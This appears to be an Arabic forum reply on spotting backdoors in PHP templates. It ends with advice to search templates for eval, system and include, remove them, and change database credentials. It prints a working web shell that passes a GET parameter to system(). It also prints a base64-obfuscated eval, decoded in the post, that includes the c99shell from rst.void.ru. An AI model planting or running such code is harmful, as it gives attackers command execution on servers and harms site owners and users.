حاول ترفع الملف من موقع اخر
عموما التلغيم يعتمد على بعض الدوال المهمه منها
eval
system
include
انت وضعت امثله للحقن بواسطة الدوال eval و include
وهذا مثال للتوضيح باستخدام system
كود PHP:
<?php
if(empty($_GET['shell'])){
} else {
$m=$_GET['shell'];
echo system($m) ;
}
?>
والبعض الاخر يقوم بتشفير الكود باستخدام اداة التشفير مثل Base64 او غيرها من برامج التشفير
مثال
كود PHP:
<?php
if(empty($_GET['shell'])){
} else {
$m=$_GET['shell'];
eval(base64_decode('aW5jbHVkZSgiaHR0cDovL3JzdC52b2lkLnJ1L2Rvd25sb2FkL2M5OXNoZWxsLnR4dD8iKTs='));
}
?>
كود:
include("http://rst.void.ru/download/c99shell.txt?"); ابحث في التمبلت عن الدوال وقم بحذفها + تغيير يوزر وباسورد القاعده